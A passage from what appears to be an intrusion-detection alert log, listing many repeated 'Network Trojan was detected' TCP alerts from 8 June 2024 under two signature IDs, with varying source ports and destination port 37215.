          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407012
          SID:2829579
          Source Port:51542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854741
          SID:2829579
          Source Port:48536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351884
          SID:2829579
          Source Port:44496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160846
          SID:2835222
          Source Port:55600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192500
          SID:2835222
          Source Port:37140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274496
          SID:2835222
          Source Port:36708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239679
          SID:2829579
          Source Port:40306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894577
          SID:2829579
          Source Port:48864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267813
          SID:2829579
          Source Port:38426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749001
          SID:2835222
          Source Port:55760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.163178
          SID:2835222
          Source Port:45046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800663
          SID:2835222
          Source Port:54062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895826
          SID:2835222
          Source Port:50434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.273174
          SID:2835222
          Source Port:45494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.605958
          SID:2829579
          Source Port:40006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.797972
          SID:2835222
          Source Port:54068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.394628
          SID:2829579
          Source Port:48820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.911891
          SID:2835222
          Source Port:53062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731115
          SID:2835222
          Source Port:60372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897629
          SID:2829579
          Source Port:37528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896541
          SID:2829579
          Source Port:52212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442385
          SID:2835222
          Source Port:39640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.189256
          SID:2835222
          Source Port:60170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732691
          SID:2829579
          Source Port:51832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667813
          SID:2835222
          Source Port:45418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188798
          SID:2829579
          Source Port:46014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155431
          SID:2835222
          Source Port:50770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264369
          SID:2835222
          Source Port:60426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041195
          SID:2835222
          Source Port:46638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.150333
          SID:2835222
          Source Port:46044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071138
          SID:2835222
          Source Port:54414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260823
          SID:2835222
          Source Port:38550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448518
          SID:2835222
          Source Port:34476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269620
          SID:2829579
          Source Port:44186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894044
          SID:2835222
          Source Port:59840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405238
          SID:2835222
          Source Port:45290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745909
          SID:2829579
          Source Port:53434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.518005
          SID:2829579
          Source Port:33990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176097
          SID:2829579
          Source Port:48134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116827
          SID:2829579
          Source Port:39580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857924
          SID:2835222
          Source Port:33378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745074
          SID:2829579
          Source Port:58426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729605
          SID:2835222
          Source Port:43832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176348
          SID:2829579
          Source Port:34742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669701
          SID:2829579
          Source Port:40734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740750
          SID:2829579
          Source Port:45510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857526
          SID:2835222
          Source Port:47668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463902
          SID:2835222
          Source Port:45098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238179
          SID:2829579
          Source Port:57116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465839
          SID:2829579
          Source Port:42482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395906
          SID:2835222
          Source Port:47802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.099488
          SID:2829579
          Source Port:42526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.296774
          SID:2829579
          Source Port:58754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738027
          SID:2829579
          Source Port:41504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884298
          SID:2829579
          Source Port:49796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151061
          SID:2835222
          Source Port:36262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827452
          SID:2835222
          Source Port:45832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152586
          SID:2835222
          Source Port:57710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787900
          SID:2829579
          Source Port:49372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884612
          SID:2829579
          Source Port:38446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.813175
          SID:2835222
          Source Port:42718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.843911
          SID:2835222
          Source Port:59872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602964
          SID:2835222
          Source Port:50378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188971
          SID:2835222
          Source Port:53062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706805
          SID:2835222
          Source Port:34526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130047
          SID:2835222
          Source Port:47844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897341
          SID:2835222
          Source Port:37946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510567
          SID:2835222
          Source Port:36474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107960
          SID:2835222
          Source Port:35056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744248
          SID:2829579
          Source Port:45532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789035
          SID:2835222
          Source Port:40948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707163
          SID:2829579
          Source Port:51204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351928
          SID:2835222
          Source Port:60940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741281
          SID:2835222
          Source Port:46164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857410
          SID:2835222
          Source Port:53550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891030
          SID:2835222
          Source Port:47946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783710
          SID:2835222
          Source Port:58208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854702
          SID:2835222
          Source Port:45882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742514
          SID:2835222
          Source Port:39812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163272
          SID:2835222
          Source Port:55228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175005
          SID:2829579
          Source Port:51520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152621
          SID:2835222
          Source Port:50204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160160
          SID:2835222
          Source Port:39818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021171
          SID:2835222
          Source Port:59964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745152
          SID:2829579
          Source Port:59682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888566
          SID:2829579
          Source Port:35188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405201
          SID:2835222
          Source Port:51038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745760
          SID:2829579
          Source Port:34498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896640
          SID:2835222
          Source Port:51344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075137
          SID:2835222
          Source Port:58666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262151
          SID:2829579
          Source Port:56680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018503
          SID:2835222
          Source Port:46074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553242
          SID:2829579
          Source Port:50682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351200
          SID:2835222
          Source Port:55752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464939
          SID:2829579
          Source Port:36730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554239
          SID:2829579
          Source Port:56158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.512780
          SID:2835222
          Source Port:46276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545941
          SID:2829579
          Source Port:59016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549757
          SID:2829579
          Source Port:44958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264729
          SID:2829579
          Source Port:60154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670205
          SID:2829579
          Source Port:33486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672586
          SID:2829579
          Source Port:43298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448458
          SID:2829579
          Source Port:39826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671451
          SID:2829579
          Source Port:35158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173057
          SID:2835222
          Source Port:52050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671099
          SID:2835222
          Source Port:46010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897299
          SID:2835222
          Source Port:58696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791845
          SID:2829579
          Source Port:57144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895059
          SID:2835222
          Source Port:56204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150551
          SID:2829579
          Source Port:45326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782987
          SID:2829579
          Source Port:35354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168233
          SID:2829579
          Source Port:33046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131741
          SID:2835222
          Source Port:46562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241594
          SID:2829579
          Source Port:55762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792023
          SID:2835222
          Source Port:49500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.021892
          SID:2835222
          Source Port:37922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175060
          SID:2835222
          Source Port:43742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177497
          SID:2829579
          Source Port:35984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892097
          SID:2829579
          Source Port:50816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.107148
          SID:2829579
          Source Port:51668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353686
          SID:2835222
          Source Port:56682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708666
          SID:2829579
          Source Port:34440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893856
          SID:2829579
          Source Port:56204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805786
          SID:2835222
          Source Port:53418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075613
          SID:2835222
          Source Port:38842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005685
          SID:2835222
          Source Port:60222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827809
          SID:2835222
          Source Port:39146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378398
          SID:2829579
          Source Port:47858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130211
          SID:2829579
          Source Port:38964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356555
          SID:2829579
          Source Port:36004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.163865
          SID:2835222
          Source Port:35512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552019
          SID:2829579
          Source Port:44104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407245
          SID:2829579
          Source Port:37520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158746
          SID:2835222
          Source Port:37482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.861144
          SID:2835222
          Source Port:39266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466141
          SID:2829579
          Source Port:44330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350964
          SID:2835222
          Source Port:51432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017647
          SID:2835222
          Source Port:59816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897093
          SID:2835222
          Source Port:44320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708796
          SID:2835222
          Source Port:44022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600674
          SID:2829579
          Source Port:43438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449513
          SID:2829579
          Source Port:47104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162566
          SID:2829579
          Source Port:45334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237954
          SID:2829579
          Source Port:36324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.401675
          SID:2829579
          Source Port:35714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159164
          SID:2835222
          Source Port:41096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671769
          SID:2835222
          Source Port:38816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671855
          SID:2835222
          Source Port:60954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550908
          SID:2829579
          Source Port:46070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057162
          SID:2835222
          Source Port:52222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466471
          SID:2835222
          Source Port:43756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161457
          SID:2829579
          Source Port:33116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742355
          SID:2835222
          Source Port:38430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136015
          SID:2829579
          Source Port:58696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671816
          SID:2829579
          Source Port:32824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.668606
          SID:2835222
          Source Port:37790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705742
          SID:2829579
          Source Port:40760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599354
          SID:2835222
          Source Port:38106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463372
          SID:2835222
          Source Port:38516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099398
          SID:2835222
          Source Port:53268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402044
          SID:2829579
          Source Port:51002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111318
          SID:2829579
          Source Port:53120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549327
          SID:2835222
          Source Port:47608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858030
          SID:2829579
          Source Port:33596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274292
          SID:2829579
          Source Port:50986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740884
          SID:2835222
          Source Port:35082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884392
          SID:2829579
          Source Port:57782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180130
          SID:2835222
          Source Port:44896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745702
          SID:2835222
          Source Port:51996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115691
          SID:2835222
          Source Port:58524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510383
          SID:2835222
          Source Port:52092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.742073
          SID:2829579
          Source Port:39154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295693
          SID:2835222
          Source Port:43314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738050
          SID:2829579
          Source Port:36374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022214
          SID:2829579
          Source Port:37968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857651
          SID:2835222
          Source Port:59480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446963
          SID:2829579
          Source Port:51882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306717
          SID:2835222
          Source Port:53866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159442
          SID:2829579
          Source Port:51292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818882
          SID:2835222
          Source Port:60488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173253
          SID:2829579
          Source Port:55280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299520
          SID:2829579
          Source Port:56210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.014656
          SID:2835222
          Source Port:44046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.176254
          SID:2829579
          Source Port:34124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.806002
          SID:2829579
          Source Port:42412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.018921
          SID:2829579
          Source Port:43122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706119
          SID:2829579
          Source Port:53102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796181
          SID:2829579
          Source Port:33728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780386
          SID:2835222
          Source Port:42250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.183966
          SID:2829579
          Source Port:40350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745897
          SID:2835222
          Source Port:44104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178513
          SID:2835222
          Source Port:60172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352973
          SID:2829579
          Source Port:56136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783753
          SID:2829579
          Source Port:49614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.158882
          SID:2835222
          Source Port:37368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600154
          SID:2829579
          Source Port:37716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270340
          SID:2835222
          Source Port:56584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
